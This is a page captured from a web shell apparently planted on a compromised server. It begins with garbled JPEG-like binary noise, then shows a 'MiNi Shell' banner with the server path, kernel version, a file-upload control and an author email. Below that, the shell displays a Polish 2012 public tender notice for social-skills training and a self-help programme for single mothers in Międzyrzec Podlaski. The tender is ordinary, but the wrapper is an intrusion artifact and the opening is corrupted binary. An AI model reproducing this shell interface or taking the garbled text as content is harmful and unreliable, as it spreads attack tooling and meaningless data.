JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/163065-N-2012.html

<p class="kh_header"><b>Międzyrzec Podlaski: Organizacja zajęć dla uczestników projektu Szansa</b><br>
<b>Numer ogłoszenia: 163065 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Piłsudskiego 6, 21-560 Międzyrzec Podlaski, woj. lubelskie, tel. 083 3717803, faks 083 3717803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/mopsmiedzyrzecpodlaski.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja zajęć dla uczestników projektu Szansa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z dwóch zadań:
1.Przedmiotem  zamówienia jest organizacja zajęć w zakresie treningu kompetencji i umiejętności społecznych  wsparcie psychologiczne dla 40 osób
2.Przedmiotem zamówienia jest opracowanie i wdrożenie Programu Aktywności Lokalnej skierowanego do  grupy docelowej   10 ciu matek samotnie wychowujących dzieci, którego celem jest zawiązanie grupy samopomocowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie zadania 2 Wykonawca musi mieć status organizacji pozarządowej o których mowa w art. 3 ust. 3 ustawy z dnia 24 kwietnia 2003 r. o działalności pożytku publicznego i o wolontariacie(Dz.U. z 2010 r. Nr 234, poz. 1536) - prowadzącej działalność socjoterapeutyczną na rzecz rodzin i osób niewydolnych wychowawczo, zagrożonych wykluczeniem społecznym na terenie miasta Międzyrzec Podlaski.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą wykonanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
w zakresie zadanie 1 - 2 (dwóch ) usług szkoleniowych polegających na przeprowadzeniu treningu kompetencji i umiejętności społecznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże , iż posiada wykwalifikowaną kadrę, która:
w zakresie zadania 1 
      - posiada minimum 3 letnie doświadczenie w prowadzeniu treningu kompetencji i umiejętności społecznych (osoba do prowadzenia treningu kompetencji i umiejętności społecznych)  
     - posiada wykształcenie wyższe o kierunku psychologia oraz minimum dwuletnie doświadczenie zawodowe (osoba do prowadzenia spotkań z psychologiem)
posiada uprawnienia doradcy zawodowego oraz doświadczenie w prowadzeniu minimum 3 szkoleń lub wsparć indywidualnych (osoba do prowadzenia warsztatów z doradcą zawodowym)
posiada wykształcenie wyższe o kierunku pedagogika oraz  doświadczenie w prowadzeniu minimum 3 szkoleń z zakresu treningu gospodarczego (osoba do prowadzenia treningu gospodarczego)
posiada minimum roczne doświadczenie w opiece nad dziećmi (osoba do opieki nad dziećmi)
w zakresie zadania 2
-posiada  uprawnienia  doradcy zawodowego (osoba do  prowadzenia szkolenia z doradztwa zawodowego)
posiada wykształcenie wyższe o kierunku psychologia (osoba do prowadzenia warsztatów z psychologiem)
posiada wykształcenie wyższe o kierunku pedagogika (osoba do prowadzenia spotkań z pedagogiem)
posiada wykształcenie wyższe o kierunku medycyna (osoba do prowadzenia spotkań z lekarzem)
posiada wykształcenie wyższe o kierunku prawo (osoba do prowadzenia spotkań z prawnikiem)
posiada wykształcenie wyższe o kierunku pedagogika oraz doświadczenie w prowadzeniu minimum 3 szkoleń treningu gospodarczego (osoba do prowadzenia treningu gospodarczego)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>w zakresie zadania numer 2 statut organizacji pozarządowej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)zmianie terminu zamówienia. Zamiana taka nie może wykraczać poza ustalone ramy czasowe zamówienia;
b)zmianie miejsca przeprowadzenia usługi, z zastrzeżeniem, że proponowane miejsce spełnia warunki określone w postępowaniu przetargowym;
c)zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu;
d)zmianie osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 10 umowy;
e)zmianie osób przy pomocy których Wykonawca realizować będzie zamówienie, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w SIWZ;  zmiana taka nie wymaga aneksu do umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/mopsmiedzyrzecpodlaski.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
21-560 Międzyrzec Podlaski
ul. Piłsudskiego 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2012 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej
21-560 Międzyrzec Podlaski
ul. Piłsudskiego 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem niniejszej umowy jest usługa zorganizowania zajęć dla osób uczestniczących w  projekcie Szansa realizowanego przez Miejski Ośrodek Pomocy Społecznej w Międzyrzecu Podlaskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> organizacja zajęć w zakresie treningu kompetencji i umiejętności społecznych - wsparcie psychologiczne dla 40 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest organizacja zajęć w zakresie treningu kompetencji i umiejętności społecznych - wsparcie psychologiczne dla 40 osób. 
1. Czas trwania: 
a) Trening kompetencji i umiejętności społecznych - 48 h na grupę  x 2 grupy = 96 h
b) Konsultacje indywidualne z psychologiem 3 godziny na osobę = 120 h , kształtowanie wizerunku  -  1 godzina na osobę 
c)Warsztaty z doradcą zawodowym 16 h na grupę x 2 grupy = 32 h
d) Konsultację indywidualne z doradcą zawodowym 1 h na osobę = 40 h
e) Trening gospodarczy 16 h na grupę x 2 grupy = 32 h
2.Termin szkolenia: 01 wrzesień -30 listopad 2012 r.
3.Czas szkolenia: zajęcia grupowe w soboty i niedzielę od 9  do 16, natomiast zajęcia indywidualne od poniedziałku do niedzieli.
4.Liczba uczestników 40 osób, podzielona na  2 grupy po  20 osób.
5.Miejsce szkolenia : Międzyrzec Podlaski
6.Minimalny zakres tematyczny :
a) Trening kompetencji i umiejętności społecznych: zasady zarządzania gospodarstwem domowym radzenie sobie ze stresem w trudnych sytuacjach życiowych, metody właściwej komunikacji interpersonalnej,budowanie poczucia własnej wartości, nauka asertywności, techniki kreatywnego rozwiązywania sytuacji problemowych, odpowiedzialność za wyniki swoich działań,
          b) Warsztaty z doradcą zawodowym oraz konsultacje indywidualne z doradcą zawodowym: budowanie obrazu własnej osoby (obraz siebie, analiza postaw życiowych, moje mocne  strony),
dokumenty aplikacyjne i autoprezentacja (zasady sporządzania dokumentów niezbędnych przy zatrudnieniu, redagowanie dokumentów aplikacyjnych i innych, przydatnych podczas poszukiwania pracy), rynek usług internetowych jako sposób na aktywność zawodową (analiza internetowych ofert  pracy), planowanie działań i wyznaczanie celów (samoocena i plan działania, wyznaczanie własnych celów), zdobycie wiedzy na temat lokalnego rynku pracy, techniki aktywnego poszukiwania pracy, przygotowanie osobistej strategii działania, instytucje i organizacje, które mogą wspierać indywidualne działania związane 
z rozwiązywaniem problemów zawodowych związanych z poszukiwaniem pracy lub podejmowaniem działalności gospodarczej, sztuka autoprezentacji
c) Trening gospodarczy: trening myślenia twórczego, zasoby jakimi dysponuje i plan ich działania - kalkulacja, ustalenie priorytetów wydatków, planowanie wydatków z wyprzedzeniem, realizacja budżetu domowego, weryfikacja budżetu domowego - wprowadzanie zmian
7. Inne postanowienia:
1)Wykonawca zapewnieni catering na zajęciach: kawa, herbata, woda gazowana, niegazowana, ciastka podczas przerw kawowych oraz  obiad składający się z dwóch dań. Obiad będzie podany w jednorazowych naczyniach z jednorazowymi sztućcami.
2)Wykonawca przygotuje szczegółowy program oraz harmonogram szkolenia. Wykonawca przed podpisaniem umowy przedstawi do akceptacji Zamawiającemu dokładny harmonogram zajęć.
3)Wykonawca zapewni materiały biurowe dla wszystkich uczestników ( materiały szkoleniowe, teczka, notes, długopis).
4)Uczestnicy szkolenia otrzymają  certyfikatów lub zaświadczenia o ukończeniu szkolenia, odpowiednio oznakowane zgodnie z wytycznymi POKL.
5)Wykonawca przygotuje raport ewaluacyjny szkoleń.
6)Wykonawca zobowiązany jest do przygotowania pełnej dokumentacji ze szkoleń: listy obecności uczestników, arkusze zajęć, raport z hospitacji zajęć szkoleniowych, listy odbioru materiałów szkoleniowych, listy odbioru posiłków.
7)Na czas trwania szkoleń Wykonawca ubezpieczy uczestników szkolenia NNW.
8)Każdy z uczestników na zakończenie szkolenia  otrzyma materiały szkoleniowe w postaci bonu o wartości 200 złotych na zakup kosmetyków oraz bonu o wartości 300 złotych na zakup sprzętu agd..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie w organizacji szkolenia - 20</li>
<li>3. doświadczenie kadry - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest opracowanie i wdrożenie Programu Aktywności Lokalnej skierowanego do  grupy docelowej  - 10-ciu matek samotnie wychowujących dzieci, którego celem jest zawiązanie grupy samopomocowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie i wdrożenie  Programu Aktywności Lokalnej skierowanego do  grupy docelowej  - 10-ciu matek samotnie wychowujących dzieci, którego celem jest zawiązanie grupy samopomocowej.
1.Wymagane działania w ramach przedmiotu zamówienia:
1)Konsultacje z doradcą zawodowym - ( zajęcia grupowe i indywidualne ) - 18 h
2)Warsztaty psychologiczne - (warsztaty grupowe i spotkania indywidualne) - 28 h
3) Spotkania z pedagogiem - (poradnictwo i warsztaty) - 28 h
4) Spotkania z lekarzem - (poradnictwo) - 4 h
5) Spotkania z prawnikiem (poradnictwo) - 12 h
6)Trening gospodarczy - (warsztaty dysponowania budżetem i prowadzenia gospodarstwa domowego) - 20 h
2.W trakcie zajęć Wykonawca musi zapewnić opiekę nad dziećmi, które są wieku od roku do 10 lat.
3.Wykonawca zorganizuje imprezy o charakterze integracyjnym z uczestnikami projektu oraz ich otoczeniem, tj. piknik oraz andrzejki.
4.Zajęcia muszą być zrealizowane w terminie od 1 września do 30 listopada 2012 r. na terenie miasta Międzyrzec Podlaski.
5.Wykonawca zapewnieni catering na zajęciach :kawa, herbata, woda gazowana, niegazowana, ciastka podczas przerw kawowych oraz  obiad składający się z dwóch dań. Obiad będzie podany w jednorazowych naczyniach z jednorazowymi sztućcami.
6.Wykonawca przygotuje szczegółowy program oraz harmonogram zajęć. Wykonawca przed podpisaniem umowy przedstawi do akceptacji Zamawiającemu dokładny harmonogram zajęć.
7.Wykonawca zapewni materiały biurowe dla wszystkich uczestników ( materiały szkoleniowe, teczka, notes, długopis).
8.Uczestnicy szkolenia otrzymają  certyfikatów lub zaświadczenia o ukończeniu szkolenia, odpowiednio oznakowane zgodnie z wytycznymi POKL.
9.Wykonawca przygotuje raport ewaluacyjny szkoleń.
10.Wykonawca sporządzi pełną dokumentację przebiegu zajęć: listy obecności uczestników, arkusze zajęć, raport z hospitalizacji działań programowych, lista odbioru materiałów szkoleniowych, lista odbioru posiłków, ankieta ewaluacyjna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com